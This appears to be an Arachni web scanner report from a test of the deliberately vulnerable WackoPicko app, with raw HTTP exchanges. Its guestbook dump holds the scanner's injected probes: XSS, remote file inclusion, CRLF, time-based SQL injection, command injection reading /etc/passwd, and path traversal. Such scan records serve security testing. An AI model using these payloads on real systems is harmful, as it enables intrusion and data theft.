<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">1</p>
<p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p>
<p class="comment">1</p>
<p> - by arachni_name<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/> </p>
<p class="comment">1</p>
<p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p>
<p class="comment">1</p>
<p> - by arachni_name()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>' </p>
<p class="comment">1</p>
<p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p>
<p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p>
<p> - by arachni_name </p>
<p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></p>
<p> - by arachni_name </p>
<p class="comment">1</textarea>--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/><!--<textarea></p>
<p> - by arachni_name </p>
<p class="comment">1%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3E</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p>
<p> - by arachni_name </p>
<p class="comment">1'"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name]]]]]]]]] </p>
<p class="comment">1<!--</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name#^($!@$)(()))****** </p>
<p class="comment">1</p>
<p> - by arachni_name'" </p>
<p class="comment">1</p>
<p> - by arachni_name<!-- </p>
<p class="comment">1#^($!@$)(()))******</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment"></script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script></p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1]]]]]]]]]</p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
<p> - by arachni_name </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
cookie
input
PHPSESSID
using
GET
at
http://192.168.0.26/WackoPicko/guestbook/
pointing to
http://192.168.0.26/WackoPicko/guestbook.php
.
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
cookie |
http://192.168.0.26/WackoPicko/guestbook/ | http://192.168.0.26/WackoPicko/guestbook.php |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 0.609705 | load |
page
|
|
||
| 1 | 0.11344 | request |
http://192.168.0.26/WackoPicko/guestbook.php |
|
||
| 2 | 0.115976 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.
| # | Data | |
|---|---|---|
| 0 |
No helper data logged. |
Inspect |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:16 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=ou68pr7mpl2mrmesf8jo9dr9l7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3530
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">1</p>
<p> - by " | /bin/cat /etc/passwd | " </p>
<p class="comment">" ; /bin/cat /etc/passwd ; "</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by | /bin/cat /etc/passwd | </p>
<p class="comment">1</p>
<p> - by ; /bin/cat /etc/passwd ; </p>
<p class="comment">` /bin/cat /etc/passwd`</p>
<p> - by arachni_name </p>
<p class="comment">" && /bin/cat /etc/passwd && "</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ' && /bin/cat /etc/passwd && ' </p>
<p class="comment">1</p>
<p> - by " ; /bin/cat /etc/passwd ; " </p>
<p class="comment">" | /bin/cat /etc/passwd | "</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ' | /bin/cat /etc/passwd | ' </p>
<p class="comment">1</p>
<p> - by " && /bin/cat /etc/passwd && " </p>
<p class="comment">1</p>
<p> - by ` /bin/cat /etc/passwd` </p>
<p class="comment">' | /bin/cat /etc/passwd | '</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";print 28763*4196403# </p>
<p class="comment">print 28763*4196403;</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';print 28763*4196403# </p>
<p class="comment">';print 28763*4196403#</p>
<p> - by arachni_name </p>
<p class="comment">print 28763*4196403</p>
<p> - by arachni_name </p>
<p class="comment">;print 28763*4196403</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by print 28763*4196403 </p>
<p class="comment">/search.php .</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by print 28763*4196403; </p>
<p class="comment">1</p>
<p> - by ;print 28763*4196403 </p>
<p class="comment">1</p>
<p> - by arachni_name';.") </p>
<p class="comment">1</p>
<p> - by arachni_name';waitfor delay '0:0:4'-- </p>
<p class="comment">1</p>
<p> - by arachni_name' where sleep(4) # </p>
<p class="comment">1</p>
<p> - by ";print 28763*4196403;# </p>
<p class="comment">;print 28763*4196403;</p>
<p> - by arachni_name </p>
<p class="comment">";print 28763*4196403;#</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ;print 28763*4196403; </p>
<p class="comment">1</p>
<p> - by ';print 28763*4196403;# </p>
<p class="comment">";print 28763*4196403#</p>
<p> - by arachni_name </p>
<p class="comment">';print 28763*4196403;#</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by /search.php . </p>
<p class="comment">1</p>
<p> - by /bin/cat /etc/passwd </p>
<p class="comment">1</p>
<p> - by && /bin/cat /etc/passwd && </p>
<p class="comment">1</p>
<p> - by /WackoPicko/pictures/search.php . </p>
<p class="comment">' ; /bin/cat /etc/passwd ; '</p>
<p> - by arachni_name </p>
<p class="comment">' && /bin/cat /etc/passwd && '</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ' ; /bin/cat /etc/passwd ; ' </p>
<p class="comment"> ; /bin/cat /etc/passwd ; </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by /pictures/search.php </p>
<p class="comment">/bin/cat /etc/passwd</p>
<p> - by arachni_name </p>
<p class="comment"> && /bin/cat /etc/passwd && </p>
<p> - by arachni_name </p>
<p class="comment">/pictures/search.php .</p>
<p> - by arachni_name </p>
<p class="comment">/WackoPicko/pictures/search.php .</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by /pictures/search.php . </p>
<p class="comment">/pictures/search.php</p>
<p> - by arachni_name </p>
<p class="comment">/WackoPicko/pictures/search.php</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by /search.php </p>
<p class="comment">1</p>
<p> - by /WackoPicko/pictures/search.php </p>
<p class="comment"> | /bin/cat /etc/passwd | </p>
<p> - by arachni_name </p>
<p class="comment">/search.php</p>
<p> - by arachni_name </p>
<p class="comment">1'=sleep(4)='</p>
<p> - by arachni_name </p>
<p class="comment">1;waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name');select pg_sleep(4); -- </p>
<p class="comment">1;select pg_sleep(4); -- </p>
<p> - by arachni_name </p>
<p class="comment">1);waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1');waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name));select pg_sleep(4); -- </p>
<p class="comment">1" or sleep(4) # </p>
<p> - by arachni_name </p>
<p class="comment">1';select pg_sleep(4); -- </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name;waitfor delay '0:0:4'-- </p>
<p class="comment">1</p>
<p> - by arachni_name'=sleep(4)=' </p>
<p class="comment">1"=sleep(4)="</p>
<p> - by arachni_name </p>
<p class="comment">1'));select pg_sleep(4); -- </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name'));select pg_sleep(4); -- </p>
<p class="comment">1</p>
<p> - by arachni_name"=sleep(4)=" </p>
<p class="comment">1</p>
<p> - by arachni_name';select pg_sleep(4); -- </p>
<p class="comment">1</p>
<p> - by arachni_name);waitfor delay '0:0:4'-- </p>
<p class="comment">1</p>
<p> - by arachni_name));waitfor delay '0:0:4'-- </p>
<p class="comment">1';.")</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name");waitfor delay '0:0:4'-- </p>
<p class="comment">1"));waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name);select pg_sleep(4); -- </p>
<p class="comment">1';waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1' and sleep(4) # </p>
<p> - by arachni_name </p>
<p class="comment">1");waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1";waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1'));waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name"));waitfor delay '0:0:4'-- </p>
<p class="comment">1</p>
<p> - by arachni_name'));waitfor delay '0:0:4'-- </p>
<p class="comment">1</p>
<p> - by arachni_name";waitfor delay '0:0:4'-- </p>
<p class="comment">1</p>
<p> - by arachni_name');waitfor delay '0:0:4'-- </p>
<p class="comment">1));select pg_sleep(4); -- </p>
<p> - by arachni_name </p>
<p class="comment">1));waitfor delay '0:0:4'-- </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name' or sleep(4) # </p>
<p class="comment">1</p>
<p> - by arachni_name" and sleep(4)=" </p>
<p class="comment">1' or sleep(4) # </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name or sleep(4) # </p>
<p class="comment">1</p>
<p> - by arachni_name' and sleep(4) # </p>
<p class="comment">1</p>
<p> - by arachni_name' and sleep(4)=' </p>
<p class="comment">1' and sleep(4)='</p>
<p> - by arachni_name </p>
<p class="comment">1 or sleep(4) # </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name" or sleep(4) # </p>
<p class="comment">1" and sleep(4)="</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name and sleep(4) </p>
<p class="comment">1</p>
<p> - by arachni_name;select pg_sleep(4); -- </p>
<p class="comment">1');select pg_sleep(4); -- </p>
<p> - by arachni_name </p>
<p class="comment">1' where sleep(4) # </p>
<p> - by arachni_name </p>
<p class="comment">1);select pg_sleep(4); -- </p>
<p> - by arachni_name </p>
<p class="comment">1 and sleep(4)</p>
<p> - by arachni_name </p>
<p class="comment">file:///../../../../../../..//etc/passwd .</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by file:///../../../../../../../..//etc/passwd </p>
<p class="comment">file:///../../../../../../../../..//etc/passwd</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by /../../../../../../../..//etc/passwd </p>
<p class="comment">/../../../../../../../../..//etc/passwd</p>
<p> - by arachni_name </p>
<p class="comment">file:///../../../../../../../../..//etc/passwd .</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by file:///../../../../../../../..//etc/passwd . </p>
